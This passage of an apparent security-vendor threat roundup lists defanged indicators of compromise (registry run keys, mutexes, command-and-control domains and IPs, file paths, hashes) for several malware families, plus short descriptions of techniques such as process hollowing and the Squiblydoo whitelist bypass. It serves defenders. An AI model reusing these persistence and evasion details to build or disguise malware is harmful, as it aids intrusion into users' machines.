<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svchost.exe
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Svchost
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svhost
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svhcost
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Loading
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: msdcsc
1
<HKCU>\SOFTWARE\DC3_FEXEC
Value Name: 1/22/2021 at 2:29:46 PM
1
Mutexes Occurrences
DC_MUTEX-<random, matching [A-Z0-9]{7}> 10
DCPERSFWBP 5
DCMUTEX 1
Local\https://docs.microsoft.com/ 1
DCMIN_MUTEX-GTM7XMF 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 1
204[.]79[.]197[.]200 1
172[.]217[.]12[.]174 1
151[.]101[.]2[.]217 1
152[.]199[.]4[.]33 1
65[.]55[.]44[.]109 1
151[.]101[.]128[.]133 1
31[.]202[.]203[.]58 1
151[.]101[.]248[.]133 1
188[.]187[.]1[.]85 1
23[.]6[.]69[.]99 1
140[.]82[.]112[.]3 1
140[.]82[.]114[.]4 1
23[.]5[.]230[.]228 1
52[.]85[.]144[.]32 1
104[.]108[.]100[.]37 1
40[.]91[.]78[.]9 1
35[.]244[.]181[.]201 1
34[.]107[.]221[.]82 1
13[.]107[.]246[.]13 1
34[.]213[.]158[.]239 1
52[.]43[.]72[.]100 1
142[.]250[.]111[.]157 1
23[.]64[.]110[.]64 1
184[.]73[.]47[.]67 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
id-user-agent[.]ddns[.]net 2
github[.]com 1
aka[.]ms 1
az725175[.]vo[.]msecnd[.]net 1
cdn[.]speedcurve[.]com 1
schema[.]org 1
stats[.]g[.]doubleclick[.]net 1
w[.]usabilla[.]com 1
www[.]google-analytics[.]com 1
github[.]map[.]fastly[.]net 1
e11290[.]dspg[.]akamaiedge[.]net 1
prod[.]balrog[.]prod[.]cloudops[.]mozgcp[.]net 1
prod[.]detectportal[.]prod[.]cloudops[.]mozgcp[.]net 1
shavar[.]prod[.]mozaws[.]net 1
cs22[.]wpc[.]v0cdn[.]net 1
search[.]r53-2[.]services[.]mozilla[.]com 1
d1zkz3k4cclnv6[.]cloudfront[.]net 1
e13630[.]dscb[.]akamaiedge[.]net 1
detectportal[.]firefox[.]com 1
aus5[.]mozilla[.]org 1
search[.]services[.]mozilla[.]com 1
shavar[.]services[.]mozilla[.]com 1
tracking-protection[.]cdn[.]mozilla[.]net 1
avatars[.]githubusercontent[.]com 1
seik[.]servegame[.]com 1
*See JSON for more IOCs
Files and or directories created Occurrences
%APPDATA%\dclogs 11
%SystemRoot%\SysWOW64\MSDCSC 4
%SystemRoot%\SysWOW64\MSDCSC\svchost.exe 4
%System32%\MSDCSC\svchost.exe 4
%HOMEPATH%\Documents\MSDCSC 2
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 2
%TEMP%\MSDCSC 2
%TEMP%\MSDCSC\svchost.exe 1
%TEMP%\DCSCMIN\IMDCSC.exe 1
%TEMP%\SYSTEM\svhcost.exe 1
%TEMP%\QCTYFQJCMK.EXE 1
%TEMP%\MSDCSC\Loading.exe 1
\chrome.2232.14.112542066 1
\chrome.2232.15.101924513 1
\chrome.2232.16.47817260 1
\chrome.2232.17.106717536 1
\chrome.2232.18.113880761 1
\chrome.2232.19.178135140 1
\chrome.2232.2.180554381 1
\chrome.2232.20.1307372 1
\chrome.2232.21.101500300 1
\chrome.2232.22.34426735 1
\chrome.2232.23.107152613 1
\chrome.2232.24.137792035 1
\chrome.2232.25.98627946 1
*See JSON for more IOCs

File Hashes

05cc3cc3ab7d46fb7669d1b75722b3dfea971100f512bfc268c2fc473addaf28 12f32717e339420d0fb271d1feeb43337f4b0c0505abeb48cc1f228ae5254c57 1389952c07869c0490046d5c4581bcf223b44f93802fcb8628fcce99273c86f3 27e600df9a2388f9cb6d1a34551926e5ba13baf113fca75eca8014becaf5cf08 86da6d04f5fb01d4e6598f44e49c6a9f263d0832dce01c74525fcfb4ef72c03a a33ad8cb740ded317b2faa2e21ba189c2edc76fe91edbb6e158d76185107f361 a96a869174797a24ba6aa150c2f7b11a5a27c289a4fd055573a030271a57e778 abc86ad35c14bf2e17fbff5f67afb7e107242a0669e1e5793609a4d62d00f474 bb40d99df4be6c486bcbd7a4162793b5b47a20aa33344231819e09ecaef499f4 d71431cf0315014cde7647af45516100002ebaa657e42d1f439ae2a26367952a e43ab694d6795d536b1f73f77edd2850f7b5f6a50730ac0d1439bf2245e5617e fefbb4fce4c5d5daf3ab3ca35c88266e216065f18811202f5b2e16a2cfbb0712

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Virus.Expiro-9826837-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WBENGINE
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WBENGINE
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMIAPSRV
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMIAPSRV
Value Name: Start
17
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
Value Name: EnableSmartScreen
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: EnableNotifications
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
17
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
17
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
17
Mutexes Occurrences
kkq-vx_mtx62 17
kkq-vx_mtx63 17
kkq-vx_mtx64 17
kkq-vx_mtx65 17
kkq-vx_mtx66 17
kkq-vx_mtx67 17
kkq-vx_mtx68 17
kkq-vx_mtx69 17
kkq-vx_mtx70 17
kkq-vx_mtx71 17
kkq-vx_mtx72 17
kkq-vx_mtx73 17
kkq-vx_mtx74 17
kkq-vx_mtx75 17
kkq-vx_mtx76 17
kkq-vx_mtx77 17
kkq-vx_mtx78 17
kkq-vx_mtx79 17
kkq-vx_mtx80 17
kkq-vx_mtx81 17
kkq-vx_mtx82 17
kkq-vx_mtx83 17
kkq-vx_mtx84 17
kkq-vx_mtx85 17
kkq-vx_mtx86 17
*See JSON for more IOCs
Files and or directories created Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 17
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 17
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 17
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 17
%ProgramFiles%\Windows Media Player\wmpnetwk.exe 17
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 17
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 17
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 17
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 17
%System32%\FXSSVC.exe 17
%System32%\UI0Detect.exe 17
%System32%\VSSVC.exe 17
%System32%\alg.exe 17
%System32%\dllhost.exe 17
%System32%\ieetwcollector.exe 17
%System32%\msdtc.exe 17
%System32%\msiexec.exe 17
%System32%\snmptrap.exe 17
%System32%\sppsvc.exe 17
%System32%\vds.exe 17
%System32%\wbem\WmiApSrv.exe 17
%System32%\wbengine.exe 17
%SystemRoot%\ehome\ehrecvr.exe 17
%SystemRoot%\ehome\ehsched.exe 17
%SystemRoot%\SysWOW64\dllhost.exe 17
*See JSON for more IOCs

File Hashes

04ddedcb415004664c59717bcb8393b1241f7d8522ee17383c5cf8053ac0f9bd 125d811f62762ada7ff0e2a54be52f8fd54932ead89defab81900036bb41f879 14bcda50f66830af5466f2be41118cd0d3ac0a64474d78f75dc911854411b51e 1a59d4905aaed2d80ffad4e4bf003f86846efe6d0abf4e7586df586b75af25f5 220641e3151852984ff4fa96176715feac9aa91a4686d4ec9b5c165baefa494a 5386b784d78338c9bc0c0a42d9f1807f3426782d5a92701715bc75bcf7f907c2 58e89668b9432a9b388b5b755a1bce0d332e268d42f8745c2aff2f2477137ecd 5ccf042b3f142d7e059bb3ca586e6a2ecd89c7e5f63364b61418fb74764a123b 62e5aa50980b401c039540215b4503679ba08d83bfb951a0c73b813c6bc2d051 63406708c0974ac147c185777c3be76bee286a4b4a9dc24c7cf0c8c9d93cadd6 6ff110a3cbd44c02e2afd4adcb6aa45029c105aaa1afdf172268a86e5259dd8f 9a70bea46b839e48407cd7f5f54448230ee23d469bd7978d98a52cf292900fed 9c9c2ef60d95fd889bc759ea98533490ffcb60ac9fe267d27656f74aaad0a995 a4d2e2358bff7240de2855a746f0ec426e405c7c47d51b3375b700e644813752 e628a2312011f02bf97925015790877e75b4034b647c569d0c09a56016045d35 f258b6a3c13317be1bd70ee92c99d9eafea975fc062187381ca559ed622fb120 f9c3836656c677c6d11f8ebf7fcb27e81b117321fb78402431020d2bc1288e31

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Chthonic-9826669-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: ShowSuperHidden
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: Load
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 1081297374
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 1081297374
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Start
1
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE
Value Name: DisableConfig
1
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE
Value Name: DisableSR
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: BrowserUpdate
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: BrowserMe
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WERSVC
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: ErrorControl
1
Mutexes Occurrences
_AVIH784909NJJNJ90707_ 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
184[.]105[.]192[.]2 15
40[.]70[.]224[.]146 15
91[.]198[.]10[.]1 2
195[.]113[.]20[.]2 1
91[.]209[.]0[.]17 1
88[.]198[.]193[.]213 1
92[.]62[.]34[.]78 1
213[.]154[.]236[.]182 1
176[.]9[.]1[.]211 1
85[.]199[.]214[.]98 1
91[.]236[.]251[.]129 1
172[.]217[.]222[.]113 1
159[.]253[.]242[.]123 1
213[.]251[.]52[.]43 1
51[.]254[.]83[.]231 1
82[.]197[.]164[.]46 1
151[.]80[.]44[.]158 1
79[.]133[.]44[.]139 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
europe[.]pool[.]ntp[.]org 15
pono11[.]eu 15
pro7778[.]com 15
www[.]telize[.]com 1
Files and or directories created Occurrences
%ProgramData%\msodtyzm.exe 15
%ProgramData%\~ 15
%TEMP%\update.exe 1
%APPDATA%\BrowserMe 1
%APPDATA%\BrowserMe\GoogleUpdate.exe 1
%APPDATA%\BrowserMe\RCX90C1.tmp 1
%APPDATA%\BrowserMe\RCX91FA.tmp 1
%APPDATA%\BrowserMe\RCX9353.tmp 1
%APPDATA%\BrowserMe\RCX105C.tmp 1
%APPDATA%\BrowserMe\RCX10DA.tmp 1
%APPDATA%\BrowserMe\RCX1196.tmp 1
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 1

File Hashes

24e808d4253f12bf07f3865542485d7351ea1c00d0968acbd864c60b9497c2e9 2c1fc999f877dcf2cd24d1dc499cdbb1037b5fff79d9061670369f03b1a193db 496703ba714a281bba90a5f6ce2a3099eb0bb7407d5d062e3db230492b1d205c 5d9f6eb4b8e4f3b5287b539cb52aebfb4da730bfc351cc21f80f32d2cdba0684 63b74d19fdde47a05e3c82c4e33e37657bf72cfcf81716cfe2b545584c1403c6 6bfe25e0f29f62515e66aceaa9ca88f89bd4b04977fdb84ac963edd69d9bb380 79b5edaa5198a5b665c9fe7bac1dcef9901525f8fbf8b380ccc8a4a142a88349 9138cc47ae9de49a51a442d284863c9e426f2df2375bd07b92ab00ad6e951f39 9f922ee86e4c522b16ed4b57de5834594dd1126f2b329cad9aa86837eb89a08a c135395fa15dc68cedb3fab4ab29c2d4bc14563e4fe3a93229fb46de2a8484cb d15d99a935ca311adbe484ef636eaf548f1f468a60fb2d8c0954dcd6410ba5f6 d160857e40fd2dea33b3f89021c4eac7399ba7e777420d6a813b469b3835db58 d67041894a16ba76161d9f0e8d213574e5a50e325c8946e64b105101341d1952 e119a73cd6ba94fbde9f63dcba75dc6a3364b547db84f92cab386ec30b1d6613 f2ab464810dd537e91433388503df0e616510c82b2b8516dec29a6fd49ec8630 fed015758b2c50974857bf24d0143f31376b940467a2392cb9f6e173aa0335a5

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (7836)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Crystalbit-Apple DLL double hijack detected - (5361)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
A Microsoft Office process has started a windows utility. - (1379)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Excessively long PowerShell command detected - (860)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Squiblydoo application whitelist bypass attempt detected. - (671)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Kovter injection detected - (517)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Dealply adware detected - (373)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Certutil.exe is downloading a file - (252)
The certutil.exe utility has been detected downloading and executing a file. Upon execution, the downloaded file behaved suspiciously. The normal usage of certutil.exe involves retrieving certificate information. Attackers can use this utility to download additional malicious payloads.
Reverse http payload detected - (113)
An exploit payload intended to connect back to an attacker controlled host using http has been detected.
Gamarue malware detected - (106)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.